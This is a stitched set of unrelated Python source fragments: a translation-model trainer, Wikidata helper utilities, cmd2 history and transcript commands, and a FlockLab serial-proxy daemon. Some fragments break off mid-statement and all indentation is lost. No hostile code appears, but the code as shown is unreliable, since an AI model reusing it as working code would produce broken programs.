for m in metrics:
m = (m[1:], False) if m[0] == "_" else (m, True)
self.metrics.append(m)
self.best_metrics = {
metric: (-1e12 if biggest else 1e12) for (metric, biggest) in self.metrics
}
# training statistics
self.epoch = 0
self.n_iter = 0
self.n_total_iter = 0
self.n_sentences = 0
self.stats = OrderedDict(
[("processed_s", 0), ("processed_w", 0)]
+ [("CLM-%s" % l, []) for l in params.langs]
+ [("CLM-%s" % ("-".join(keys)), []) for keys in data["para"].keys()]
+ [("CLM-%s" % "-".join(keys[::-1]), []) for keys in data["para"].keys()]
+ [("MLM-%s" % l, []) for l in params.langs]
+ [("MLM-%s" % ("-".join(keys)), []) for keys in data["para"].keys()]
+ [("MLM-%s" % "-".join(keys[::-1]), []) for keys in data["para"].keys()]
+ [("AE-%s" % lang, []) for lang in params.ae_steps]
+ [("MT-%s-%s" % (l1, l2), []) for l1, l2 in params.mt_steps]
+ [
("MT-%s-%s-%s" % (l1, l2, span), [])
for l1, l2, span in params.mt_spans_steps
]
+ [("DO-%s-%s" % (l1, l2), []) for l1, l2 in params.do_steps]
+ [("Classif-%s-%s" % (l1, l2), []) for l1, l2 in params.classif_steps]
+ [("BT-%s-%s-%s" % (l1, l2, l3), []) for l1, l2, l3 in params.bt_steps]
+ [
("ST-%s:%s-%s" % (l1, l1, l2), [])
for l1, langs2 in params.st_steps
for l2 in langs2
]
+ [
("ST-%s:%s-%s" % (l1, l2, l1), [])
for l1, langs2 in params.st_steps
for l2 in langs2
]
+ [
("ST-%s:%s-%s" % (l1, l2_1, l2_2), [])
for l1, langs2 in params.st_steps
for l2_1 in langs2
for l2_2 in langs2
if l2_1 != l2_2
]
)
self.last_time = time.time()
self.st_langs = set()
for lang1, langs2 in params.st_steps:
for l1 in [lang1] + list(langs2):
for l2 in [lang1] + list(langs2):
if l1 < l2:
self.st_langs.add((l1, l2))
self.cache_class = RoundRobinCache if params.robin_cache else ListCache
self.st_cache = {
tuple([l1, l2]): self.cache_class(params=params) for l1, l2 in self.st_langs
}
self.number_consecutive_reads = 0
if params.cache_init_path != "":
self.load_initial_cache()
# reload potential checkpoints
self.reload_checkpoint()
# initialize lambda coefficients and their configurations
parse_lambda_config(params)
def load_initial_cache(self):
for (l1, l2), cache in self.st_cache.items():
cache_path = Path(self.params.cache_init_path).joinpath(
f"cache_{l1}-{l2}.pkl"
)
assert cache_path.is_file(), f"initial cache file {cache_path} is missing"
cache.load(cache_path)
def set_parameters(self):
"""
Set parameters.
"""
self.parameters = {}
named_params = []
for name in self.MODEL_NAMES:
models = getattr(self, name)
if isinstance(models, list):
for model in models:
named_params.extend(
[(k, p) for k, p in model.named_parameters() if p.requires_grad]
)
else:
named_params.extend(
[(k, p) for k, p in models.named_parameters() if p.requires_grad]
)
# model parameters
self.parameters["model"] = [p for k, p in named_params]
# log
for k, v in self.parameters.items():
logger.info("Found %i parameters in %s." % (len(v), k))
assert len(v) >= 1
def set_optimizers(self):
"""
Set optimizers.
"""
params = self.params
self.optimizers = {}
# model optimizer
self.optimizers["model"] = get_optimizer(
self.parameters["model"], params.optimizer
)
# log
logger.info("Optimizers: %s" % ", ".join(self.optimizers.keys()))
def init_amp(self):
"""
Initialize AMP optimizer.
"""
params = self.params
assert (
params.amp == 0
and params.fp16 is False
or params.amp in [1, 2, 3]
and params.fp16 is True
)
opt_names = self.optimizers.keys()
models = [
model
for name in self.MODEL_NAMES
for model in (
getattr(self, name)
if isinstance(getattr(self, name), list)
else [getattr(self, name)]
)
]
models, optimizers = apex.amp.initialize(
models,
[self.optimizers[k] for k in opt_names],
opt_level=("O%i" % params.amp),
)
current_index = 0
for name in self.MODEL_NAMES:
model_attr = getattr(self, name)
if isinstance(model_attr, list):
models_length = len(model_attr)
setattr(
self, name, models[current_index : current_index + models_length]
)
current_index += models_length
else:
setattr(self, name, models[current_index])
current_index += 1
assert current_index == len(models)
self.optimizers = {
opt_name: optimizer for opt_name, optimizer in zip(opt_names, optimizers)
}
def optimize(self, loss):
"""
Optimize.
"""
# check NaN
if (loss != loss).data.any():
logger.warning("NaN detected")
# exit()
params = self.params
# optimizers
names = self.optimizers.keys()
optimizers = [self.optimizers[k] for k in names]
# regular optimization
if params.amp == -1:
for optimizer in optimizers:
optimizer.zero_grad()
loss.backward()
if params.clip_grad_norm > 0:
for name in names:
# norm_check_a = (sum([p.grad.norm(p=2).item() ** 2 for p in self.parameters[name]])) ** 0.5
clip_grad_norm_(self.parameters[name], params.clip_grad_norm)
# norm_check_b = (sum([p.grad.norm(p=2).item() ** 2 for p in self.parameters[name]])) ** 0.5
# print(name, norm_check_a, norm_check_b)
for optimizer in optimizers:
optimizer.step()
# AMP optimization
else:
if self.n_iter % params.accumulate_gradients == 0:
with apex.amp.scale_loss(loss, optimizers) as scaled_loss:
scaled_loss.backward()
if params.clip_grad_norm > 0:
for name in names:
# norm_check_a = (sum([p.grad.norm(p=2).item() ** 2 for p in apex.amp.master_params(self.optimizers[name])])) ** 0.5
clip_grad_norm_(
apex.amp.master_params(self.optimizers[name]),
params.clip_grad_norm,
)
# norm_check_b = (sum([p.grad.norm(p=2).item() ** 2 for p in apex.amp.master_params(self.optimizers[name])])) ** 0.5
# print(name, norm_check_a, norm_check_b)
for optimizer in optimizers:
optimizer.step()
optimizer.zero_grad()
else:
with apex.amp.scale_loss(
loss, optimizers, delay_unscale=True
) as scaled_loss:
scaled_loss.backward()
def iter(self):
"""
End of iteration.
"""
self.n_iter += 1
self.n_total_iter += 1
update_lambdas(self.params, self.n_total_iter)
if self.n_iter % 5 == 0:
self.print_stats()
def print_stats(self):
"""
Print statistics about the training.
"""
# if self.n_total_iter % 5 != 0:
# return
s_iter = "%7i - " % self.n_total_iter
s_stat = " || ".join(
[
"{}: {:7.4f}".format(k, np.mean(v))
for k, v in self.stats.items()
if type(v) is list and len(v) > 0
]
)
for k in self.stats.keys():
if type(self.stats[k]) is list:
del self.stats[k][:]
# learning rates
s_lr = " - "
for k, v in self.optimizers.items():
s_lr = (
s_lr
+ (" - %s LR: " % k)
+ " / ".join("{:.4e}".format(group["lr"]) for group in v.param_groups)
)
if self.params.bt_sample_temperature > 0:
s_bt_samp = " - BT-sampling-T: " + "{:2.2e}".format(
self.params.bt_sample_temperature
)
else:
s_bt_samp = ""
# processing speed
new_time = time.time()
diff = new_time - self.last_time
s_speed = "{:7.2f} sent/s - {:8.2f} words/s - ".format(
self.stats["processed_s"] * 1.0 / | |
#!/usr/bin/python
# -*- coding: utf-8 -*-
import json
import csv
import re
import os
import mwparserfromhell as wparser
import string
import pywikibot
import datetime
import requests
import pymysql
import random
from urllib.parse import quote
from wikidataStuff.WikidataStuff import WikidataStuff as wds
site_cache = {}
def remove_empty_dicts_from_list(list_of_dicts):
return [i for i in list_of_dicts if i]
def save_to_file(filename, content, silent=False):
with open(filename, 'w', encoding="utf-8") as f:
f.write(content)
if not silent:
print("SAVED FILE " + filename)
def json_to_file(filename, json_content, silent=False):
with open(filename, 'w', encoding="utf-8") as f:
json.dump(json_content, f, sort_keys=True,
indent=4,
ensure_ascii=False,
default=datetime_convert)
if not silent:
print("SAVED FILE " + filename)
def create_dir(out_path):
"""
Create a directory if it doesn't exist.
@param out_path: directory to create
"""
if not out_path:
raise ValueError('Cannot a create directory without a name.')
if not os.path.exists(out_path):
os.mkdir(out_path)
elif os.path.isfile(out_path):
raise ValueError(
'Cannot create the directory "{}" as a file with that name '
'already exists.'.format(out_path))
def get_specific_table_name(countryname, languagename):
return "monuments_{}_({})".format(countryname, languagename)
def get_number_of_rows(connection, tablename):
cursor = connection.cursor()
query = "SELECT COUNT(*) FROM `" + tablename + "`"
cursor.execute(query)
result = cursor.fetchone()
return result[0]
def table_exists(connection, tablename):
try:
if get_number_of_rows(connection, tablename) > 0:
return True
except pymysql.ProgrammingError:
return False
def load_json(filename):
try:
with open(filename, encoding="utf-8") as f:
try:
return json.load(f)
except ValueError:
print("Failed to decode file {}.".format(filename))
except OSError:
print("File {} does not exist.".format(filename))
def datetime_convert(dt_object):
if isinstance(dt_object, datetime.datetime):
return dt_object.__str__()
def remove_multiple_spaces(text):
return re.sub(' +', ' ', text)
def remove_markup(text):
remove_br = re.compile('<br.*?>\W*', re.I)
text = remove_br.sub(' ', text)
text = " ".join(text.split())
if "[" in text or "''" in text:
text = wparser.parse(text)
text = text.strip_code()
return remove_multiple_spaces(text.strip())
def contains_digit(text):
return any(x.isdigit() for x in text)
def get_external_links(wikitext):
"""Retrieve external url's from wikitext."""
urls = []
links = wparser.parse(wikitext).filter_external_links()
if len(links) > 0:
for link in links:
urls.append(link.url)
return urls
def is_legit_house_number(text):
number_regex = re.compile(
'\d{1,3}\s?([A-Z]{1})?((-|–)\d{1,3})?\s?([A-Z]{1})?')
m = number_regex.match(text)
if m:
return True
else:
return False
def get_street_address(address, language):
address = remove_markup(address)
if language == "sv":
# Try to see if it's a legit-ish street address
# numbers like 3, 3A, 2-4
# oh, and sometimes it's not a _street_ name: "Norra Kik 7"
# street names can consist of several words: "<NAME> gata 19"
# how about: "Östra skolan, Bergaliden 24"
# "Västanåvägen 12-6, Näsum"
# If there's a comma, order can vary
#####
# regex should match: 12, 3, 43-45, 34b, 43B, 25 a, 43B-43E
legit_address = None
interesting_part = ""
patterns = ["gatan", "vägen", " väg", " gata",
" torg", "torget", " plats", "platsen", " gränd",
"kajen", "promenaden", "liden", "stigen"]
if "," in address:
address_split = address.split(",", re.IGNORECASE)
for part in address_split:
if (any(substring in part for substring in patterns) and
contains_digit(part)):
interesting_part = part.strip()
else:
if (any(substring in address for substring in patterns) and
contains_digit(address)):
interesting_part = address
if len(interesting_part) > 1:
interesting_part_split = interesting_part.split(" ")
for part in interesting_part_split:
if contains_digit(part) and is_legit_house_number(part):
legit_address = interesting_part.rstrip(',.-')
return legit_address
def get_wikilinks(text):
parsed = wparser.parse(text)
return parsed.filter_wikilinks()
def get_unique_wikilinks(text):
results = []
wikilinks = get_wikilinks(text)
for wikilink in wikilinks:
if wikilink not in results:
results.append(wikilink)
return results
def count_wikilinks(text):
return len(get_wikilinks(text))
def q_from_wikipedia(language, page_title):
"""
Get the ID of the WD item linked to a wp page.
If the page exists, has no item and is in the article
namespace, create an item for it.
"""
# various cleanup
if page_title.startswith("[[") and page_title.endswith("]]"):
internal_links = get_wikilinks(page_title)
if not internal_links:
return
page_title = internal_links[0].title
if isinstance(page_title, str):
# get_wikilinks()[0].title does not return a str
page_title = page_title.replace('\n', ' ')
if not page_title:
return
wp_site = pywikibot.Site(language, "wikipedia")
page = pywikibot.Page(wp_site, page_title)
summary = "Creating item for {} on {}wp."
summary = summary.format(page_title, language)
wd_repo = create_site_instance("wikidata", "wikidata")
wdstuff = wds(wd_repo, edit_summary=summary, no_wdss=True)
if page.exists():
if page.isRedirectPage():
page = page.getRedirectTarget()
if page.isDisambig():
return
try:
item = pywikibot.ItemPage.fromPage(page)
except pywikibot.NoPage:
if page.namespace() != 0: # main namespace
return
item = wdstuff.make_new_item_from_page(page, summary)
return item.getID()
def q_from_first_wikilink(language, text):
try:
wikilink = get_wikilinks(text)[0]
return q_from_wikipedia(language, wikilink.title)
except IndexError:
return
def get_matching_items_from_dict(value, dict_name):
"""
Return all items in a dict for which the label matches the provided value.
@param value: the value to match
@param dict_name: the dict to look in
"""
matches = [dict_name[x]["items"]
for x in dict_name if x.lower() == value]
if len(matches) == 0:
return []
else:
return matches[0]
def get_item_from_dict_by_key(dict_name,
search_term,
search_in,
return_content_of="item"):
"""
Return all items in a dict with a certain field match.
It will normally return the content of the field
'item' which is expected to contain a Q-item.
It is, however, possible to overwrite the name
of the field whose contents should be returned.
@param dict_name: the dictionary to look in
@pram search_term: the value to match
@param search_in: the field in which to look for matching value
@param return_content_of: the field whose content to return
"""
results = []
matches = [x for x in dict_name if x[search_in] == search_term]
if len(matches) == 0:
return []
else:
for match in matches:
results.append(match[return_content_of])
return results
def legit_year(text):
year = None
if text and text.isdigit():
if int(text) >= 1 and int(text) <= 2020:
year = int(text)
return year
def legit_year_range(text):
year_range = None
if "-" in text and len(text.split("-")) == 2:
part_one = text.split("-")[0]
part_two = text.split("-")[1]
if parse_year(part_one) and parse_year(part_two):
if (len(part_one) == len(part_two) and
int(part_two) > int(part_one)):
year_range = (int(part_one), int(part_two))
elif len(part_one) == 4 and len(part_two) == 2:
full_length_part_two = part_one[:2] + part_two
if int(full_length_part_two) > int(part_one):
year_range = (int(part_one), int(full_length_part_two))
return year_range
def parse_year(text):
year = None
if legit_year(text):
year = legit_year(text)
elif ("-") in text:
year = legit_year_range(text)
return year
def get_longest_string(in_list):
"""
Get the longest string(s) in a list.
:param in_list: list of strings
:return: single string if there's only one with the max length,
or a list of strings if there are several.
"""
if len(in_list) == 0:
return None
max_length = max(len(x) for x in in_list)
matches = [x for x in in_list if len(x) == max_length]
if len(matches) == 1:
return matches[0]
else:
return matches
def get_longest_match(word, keywords):
"""
Given a list of keywords, get longest keyword that overlaps with input.
A naive attempt to match words in languages that use
compound nouns written together. Given a string and a list of
keywords, return the longest of these keywords that's
contained in the input string. That way, if the keyword list
contains both a simple word ("bro") and its compound ("järnvägsbro"),
we only get the more specific one:
* "götaälvsbron" -> "bro"
* "en stor järnvägsbro" -> "järnvägsbro"
"""
matches = []
for k in keywords:
if k in word:
matches.append(k)
return get_longest_string(matches)
def remove_characters(text, string_of_chars_to_remove):
translator = str.maketrans(
{key: None for key in string_of_chars_to_remove})
return text.translate(translator)
def comma_to_period(text):
return text.replace(",", ".")
def remove_marks_from_ends(text):
return text.lstrip(string.punctuation).rstrip(string.punctuation)
def string_to_float(text):
text_clean = remove_marks_from_ends(text)
text_clean = comma_to_period(text_clean)
return float(text_clean)
def parse_ship_dimensions(text):
dimensions_vocab = {
"längd": "length",
"bredd": "width",
"djup": "draft",
"brt": "grt"
}
dimensions_dict = {}
dimensions_list = text.split(" ")
for i, item in enumerate(dimensions_list):
if contains_digit(item):
try:
number_part = string_to_float(comma_to_period(item))
associated_word = remove_marks_from_ends(
dimensions_list[i - 1].lower())
word_part = dimensions_vocab[associated_word]
dimensions_dict[word_part] = number_part
except (ValueError, KeyError):
continue
return dimensions_dict
def is_vowel(char):
vowels = "auoiyéeöåäáæø"
if char.lower() in vowels:
return True
else:
return False
def get_last_char(text):
return text[-1]
def last_char_is_vowel(text):
return is_vowel(get_last_char(text))
def first_char_is_number(text):
"""Check if string starts with a number."""
return text[0].isdigit()
def socken_to_q(socken, landskap):
if last_char_is_vowel(socken) or get_last_char(socken) == "s":
socken_name = socken + " socken"
else:
socken_name = socken + "s socken"
socken_and_landskap = socken_name + ", " + landskap
if wp_page_exists("sv", socken_and_landskap):
return q_from_wikipedia("sv", socken_and_landskap)
elif wp_page_exists("sv", socken_name):
return q_from_wikipedia("sv", socken_name)
def get_http_code(url):
r = requests.get(url)
return r.status_code
def get_bbr_link(text):
"""
raa/bbr/21300000003265
"""
base_url = "http://kulturarvsdata.se/raa/"
url_bbr = base_url + "bbr/" + text
url_bbra = base_url + "bbra/" + text
if get_http_code(url_bbra) == 200:
return "raa/bbra/" + text
elif get_http_code(url_bbr) == 200:
return "raa/bbr/" + text
def get_rid_of_brackets(text):
if "(" in text:
return re.sub('\(.*?\)', '', text).strip()
else:
return text
def get_text_inside_brackets(text):
"""
Get the content of the first encountered occurence of round brackets.
Handles nested brackets by getting the content of
the first level:
foo (cat) → cat
text (foo (bar (cat))) around → foo (bar (cat))
Does not handle multiple instances | |
and readline history
self.history.clear()
if self.persistent_history_file:
os.remove(self.persistent_history_file)
if rl_type != RlType.NONE:
readline.clear_history()
return
# If an argument was supplied, then retrieve partial contents of the history
cowardly_refuse_to_run = False
if args.arg:
# If a character indicating a slice is present, retrieve
# a slice of the history
arg = args.arg
arg_is_int = False
try:
int(arg)
arg_is_int = True
except ValueError:
pass
if '..' in arg or ':' in arg:
# Get a slice of history
history = self.history.span(arg, args.all)
elif arg_is_int:
history = [self.history.get(arg)]
elif arg.startswith(r'/') and arg.endswith(r'/'):
history = self.history.regex_search(arg, args.all)
else:
history = self.history.str_search(arg, args.all)
else:
# If no arg given, then retrieve the entire history
cowardly_refuse_to_run = True
# Get a copy of the history so it doesn't get mutated while we are using it
history = self.history.span(':', args.all)
if args.run:
if cowardly_refuse_to_run:
self.perror("Cowardly refusing to run all previously entered commands.")
self.perror("If this is what you want to do, specify '1:' as the range of history.")
else:
return self.runcmds_plus_hooks(history)
elif args.edit:
import tempfile
fd, fname = tempfile.mkstemp(suffix='.txt', text=True)
with os.fdopen(fd, 'w') as fobj:
for command in history:
if command.statement.multiline_command:
fobj.write('{}\n'.format(command.expanded))
else:
fobj.write('{}\n'.format(command.raw))
try:
self._run_editor(fname)
# noinspection PyTypeChecker
self.do_run_script(utils.quote_string(fname))
finally:
os.remove(fname)
elif args.output_file:
try:
with open(os.path.expanduser(args.output_file), 'w') as fobj:
for item in history:
if item.statement.multiline_command:
fobj.write('{}\n'.format(item.expanded))
else:
fobj.write('{}\n'.format(item.raw))
plural = 's' if len(history) > 1 else ''
except OSError as e:
self.pexcept('Error saving {!r} - {}'.format(args.output_file, e))
else:
self.pfeedback('{} command{} saved to {}'.format(len(history), plural, args.output_file))
elif args.transcript:
self._generate_transcript(history, args.transcript)
else:
# Display the history items retrieved
for hi in history:
self.poutput(hi.pr(script=args.script, expanded=args.expanded, verbose=args.verbose))
def _initialize_history(self, hist_file):
"""Initialize history using history related attributes
This function can determine whether history is saved in the prior text-based
format (one line of input is stored as one line in the file), or the new-as-
of-version 0.9.13 pickle based format.
History created by versions <= 0.9.12 is in readline format, i.e. plain text files.
Initializing history does not effect history files on disk, versions >= 0.9.13 always
write history in the pickle format.
"""
self.history = History()
# with no persistent history, nothing else in this method is relevant
if not hist_file:
self.persistent_history_file = hist_file
return
hist_file = os.path.abspath(os.path.expanduser(hist_file))
# on Windows, trying to open a directory throws a permission
# error, not a `IsADirectoryError`. So we'll check it ourselves.
if os.path.isdir(hist_file):
msg = "Persistent history file '{}' is a directory"
self.perror(msg.format(hist_file))
return
# Create the directory for the history file if it doesn't already exist
hist_file_dir = os.path.dirname(hist_file)
try:
os.makedirs(hist_file_dir, exist_ok=True)
except OSError as ex:
msg = "Error creating persistent history file directory '{}': {}".format(hist_file_dir, ex)
self.pexcept(msg)
return
# first we try and unpickle the history file
history = History()
try:
with open(hist_file, 'rb') as fobj:
history = pickle.load(fobj)
except (AttributeError, EOFError, FileNotFoundError, ImportError, IndexError, KeyError, ValueError,
pickle.UnpicklingError):
# If any of these errors occur when attempting to unpickle, just use an empty history
pass
except OSError as ex:
msg = "Can not read persistent history file '{}': {}"
self.pexcept(msg.format(hist_file, ex))
return
self.history = history
self.history.start_session()
self.persistent_history_file = hist_file
# populate readline history
if rl_type != RlType.NONE:
last = None
for item in history:
# Break the command into its individual lines
for line in item.raw.splitlines():
# readline only adds a single entry for multiple sequential identical lines
# so we emulate that behavior here
if line != last:
readline.add_history(line)
last = line
# register a function to write history at save
# if the history file is in plain text format from 0.9.12 or lower
# this will fail, and the history in the plain text file will be lost
import atexit
atexit.register(self._persist_history)
def _persist_history(self):
"""Write history out to the history file"""
if not self.persistent_history_file:
return
self.history.truncate(self._persistent_history_length)
try:
with open(self.persistent_history_file, 'wb') as fobj:
pickle.dump(self.history, fobj)
except OSError as ex:
msg = "Can not write persistent history file '{}': {}"
self.pexcept(msg.format(self.persistent_history_file, ex))
def _generate_transcript(self, history: List[Union[HistoryItem, str]], transcript_file: str) -> None:
"""Generate a transcript file from a given history of commands"""
# Validate the transcript file path to make sure directory exists and write access is available
transcript_path = os.path.abspath(os.path.expanduser(transcript_file))
transcript_dir = os.path.dirname(transcript_path)
if not os.path.isdir(transcript_dir) or not os.access(transcript_dir, os.W_OK):
self.perror("{!r} is not a directory or you don't have write access".format(transcript_dir))
return
commands_run = 0
try:
with self.sigint_protection:
# Disable echo while we manually redirect stdout to a StringIO buffer
saved_echo = self.echo
saved_stdout = self.stdout
self.echo = False
# The problem with supporting regular expressions in transcripts
# is that they shouldn't be processed in the command, just the output.
# In addition, when we generate a transcript, any slashes in the output
# are not really intended to indicate regular expressions, so they should
# be escaped.
#
# We have to jump through some hoops here in order to catch the commands
# separately from the output and escape the slashes in the output.
transcript = ''
for history_item in history:
# build the command, complete with prompts. When we replay
# the transcript, we look for the prompts to separate
# the command from the output
first = True
command = ''
if isinstance(history_item, HistoryItem):
history_item = history_item.raw
for line in history_item.splitlines():
if first:
command += '{}{}\n'.format(self.prompt, line)
first = False
else:
command += '{}{}\n'.format(self.continuation_prompt, line)
transcript += command
# Use a StdSim object to capture output
self.stdout = utils.StdSim(self.stdout)
# then run the command and let the output go into our buffer
try:
stop = self.onecmd_plus_hooks(history_item, raise_keyboard_interrupt=True)
except KeyboardInterrupt as e:
self.perror(e)
stop = True
commands_run += 1
# add the regex-escaped output to the transcript
transcript += self.stdout.getvalue().replace('/', r'\/')
# check if we are supposed to stop
if stop:
break
finally:
with self.sigint_protection:
# Restore altered attributes to their original state
self.echo = saved_echo
self.stdout = saved_stdout
# Check if all commands ran
if commands_run < len(history):
warning = "Command {} triggered a stop and ended transcript generation early".format(commands_run)
self.pwarning(warning)
# finally, we can write the transcript out to the file
try:
with open(transcript_file, 'w') as fout:
fout.write(transcript)
except OSError as ex:
self.pexcept('Failed to save transcript: {}'.format(ex))
else:
# and let the user know what we did
if commands_run > 1:
plural = 'commands and their outputs'
else:
plural = 'command and its output'
msg = '{} {} saved to transcript file {!r}'
self.pfeedback(msg.format(commands_run, plural, transcript_file))
edit_description = ("Run a text editor and optionally open a file with it\n"
"\n"
"The editor used is determined by a settable parameter. To set it:\n"
"\n"
" set editor (program-name)")
edit_parser = DEFAULT_ARGUMENT_PARSER(description=edit_description)
edit_parser.add_argument('file_path', nargs=argparse.OPTIONAL,
help="optional path to a file to open in editor", completer_method=path_complete)
@with_argparser(edit_parser)
def do_edit(self, args: argparse.Namespace) -> None:
"""Run a text editor and optionally open a file with it"""
self._run_editor(args.file_path)
def _run_editor(self, file_path: Optional[str]) -> None:
"""
Run a text editor and optionally open a file with it
:param file_path: optional path of the file to edit
:raises: EnvironmentError if self.editor is not set
"""
if not self.editor:
raise EnvironmentError("Please use 'set editor' to specify your text editing program of choice.")
command = utils.quote_string(os.path.expanduser(self.editor))
if file_path:
command += " " + utils.quote_string(os.path.expanduser(file_path))
# noinspection PyTypeChecker
self.do_shell(command)
@property
def _current_script_dir(self) -> Optional[str]:
"""Accessor to get the current script directory from the _script_dir LIFO queue."""
if self._script_dir:
return self._script_dir[-1]
else:
return None
run_script_description = ("Run commands in script file that is encoded as either ASCII or UTF-8 text\n"
"\n"
"Script should contain one command per line, just like the command would be\n"
"typed in the console.\n"
"\n"
"If the -t/--transcript flag is used, this command instead records\n"
"the output of the script commands to a transcript for testing purposes.\n")
run_script_parser = DEFAULT_ARGUMENT_PARSER(description=run_script_description)
run_script_parser.add_argument('-t', '--transcript', metavar='TRANSCRIPT_FILE',
help='record the output of the script as a transcript file',
completer_method=path_complete)
run_script_parser.add_argument('script_path', help="path to the script file", completer_method=path_complete)
@with_argparser(run_script_parser)
def do_run_script(self, args: argparse.Namespace) -> Optional[bool]:
"""Run commands in script file that is | |
#! /usr/bin/env python3
"""
Copyright (c) 2010 - 2020, ETH Zurich, Computer Engineering Group
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of the copyright holder nor the names of its
contributors may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
"""
import os, sys, getopt, traceback, MySQLdb, signal, time, errno, subprocess, logging, __main__, multiprocessing, queue, threading, select, socket, io, lxml.etree
import lib.daemon as daemon
import lib.flocklab as flocklab
logger = None
debug = False
stopevent = None
reloadevent = None
##############################################################################
#
# sigterm_handler
#
##############################################################################
def sigterm_handler(signum, frame):
"""If the program is terminated by sending it the signal SIGTERM
(e.g. by executing 'kill') or SIGINT (pressing ctrl-c),
this signal handler is invoked for cleanup."""
# NOTE: logging should not be used in signal handlers: https://docs.python.org/2/library/logging.html#thread-safety
global stopevent
global reloadevent
logger.debug("sigterm_handler: signal %u received" % (signum))
# Signal all threads to stop:
if signum == signal.SIGTERM and stopevent:
stopevent.set()
elif signum == signal.SIGINT and reloadevent:
reloadevent.set()
### END sigterm_handler
##############################################################################
#
# listen_process
#
##############################################################################
def listen_process(port, newConnectionQueue, _stopevent):
while not _stopevent.is_set():
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(('',port))
sock.settimeout(1)
logger.info("Started socket %s:%d"%('',port))
while not _stopevent.is_set():
sock.listen(1)
try:
connection, address = sock.accept()
except socket.timeout:
continue
connection.settimeout(None)
logger.info("Connection from %s at port %d"%(str(address),port))
address = (address[0], port)
newConnectionQueue.put((connection, address))
logger.info("Listen process on port %d ended." % port)
except:
logger.error("Listen process on port %d: Socket error %s"%(port,str(sys.exc_info()[1])))
time.sleep(5)
### END listen_process
##############################################################################
#
# obs_connect_process
#
##############################################################################
def obs_connect_process(conreqQueue, condoneQueue, _stopevent):
worklist = []
while not _stopevent.is_set():
try:
req = conreqQueue.get(True, 1)
worklist.append(req)
except queue.Empty:
pass
for w in worklist:
if w is None:
worklist = []
break
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect(w)
logger.info("Connected to observer %s on port %d" % (w[0],w[1]))
condoneQueue.put((sock, w))
worklist.remove(w)
except ConnectionRefusedError:
logger.info("Could not connect to observer %s on port %d, will retry later..." % (w[0],w[1]))
time.sleep(5)
except Exception:
logger.warn("Could not connect to observer %s on port %d: %s, %s\n%s" % (w[0], w[1], str(sys.exc_info()[0]), str(sys.exc_info()[1]), traceback.format_exc()))
worklist.remove(w)
### END obs_connect_process
##############################################################################
#
# update_configuration_from_db
#
##############################################################################
def update_configuration_from_db():
# Get needed metadata from database ---
# for all running / preparing tests
# for each observer used in a serial configuration
# (user remoteIp, server port, observer ip, port)
proxystartport = flocklab.config.getint('serialproxy', 'startport')
obsdataport = flocklab.config.getint('serialproxy', 'obsdataport')
proxyConfig = []
logger.debug("Updating configuration from DB...")
try:
(cn, cur) = flocklab.connect_to_db()
cur.execute('SET time_zone="+0:00"')
except:
msg = "Could not connect to database"
logger.error(msg)
flocklab.error_logandexit(msg, errno.EAGAIN)
try:
# Get the XML config from the database:
cur.execute("SELECT `testconfig_xml`, `serv_tests_key` FROM `tbl_serv_tests` WHERE (`test_status` IN ('preparing', 'running') AND `time_end_wish` >= NOW())")
ret = cur.fetchall()
for testconfig in ret:
logger.debug("Create proxy config for test %d" % testconfig[1])
# get slot mappings
cur.execute("SELECT `observer_id`, `ethernet_address`, `slot` FROM `tbl_serv_map_test_observer_targetimages` `a` left join `tbl_serv_observer` `b` ON (`a`.`observer_fk` = `b`.`serv_observer_key`) WHERE `test_fk` = %d" % testconfig[1])
mapret = cur.fetchall()
mapping = {} # dict obsid -> (ip_address, port)
for m in mapret:
if not m[2] is None:
mapping[int(m[0])] = (m[1], obsdataport)
parser = lxml.etree.XMLParser(remove_comments=True)
tree = lxml.etree.fromstring(bytes(bytearray(testconfig[0], encoding = 'utf-8')), parser)
ns = {'d': flocklab.config.get('xml', 'namespace')}
logger.debug("Got XML from database.")
## Process serial configuration ---
srconfs = tree.xpath('//d:serialConf', namespaces=ns)
for srconf in srconfs:
obsids = srconf.xpath('d:obsIds', namespaces=ns)[0].text.split()
remoteIp = srconf.xpath('d:remoteIp', namespaces=ns)
if not remoteIp:
continue # skip
remoteIp = remoteIp[0].text
# Create a pair of FIFO pipes for every observer and start ncat:
for obsid in obsids:
if int(obsid) in mapping:
proxyConfig.append(((remoteIp, proxystartport + int(obsid)),mapping[int(obsid)]))
if len(proxyConfig) == 0:
logger.info("No serial forwarders required.")
else:
logger.debug("Current proxy configuration:")
for pc in proxyConfig:
logger.debug("%s:%d <-> %s:%d" % (pc[0][0],pc[0][1],pc[1][0],pc[1][1]))
return proxyConfig
except MySQLdb.Error as err:
msg = str(err)
logger.error(msg)
flocklab.error_logandexit(msg, errno.EIO)
except:
logger.warning("Error %s: %s" %(str(sys.exc_info()[0]), str(sys.exc_info()[1])))
raise
### END update_configuration_from_db
##############################################################################
#
# class ProxyConnections
#
##############################################################################
class ProxyConnections():
server_socket_process_list = {} # dict port > process
obs_socket_list = {} # dict (obs,slot) -> socket
server_socket_list = {} # dict (clientaddr, obs, slot) -> socket
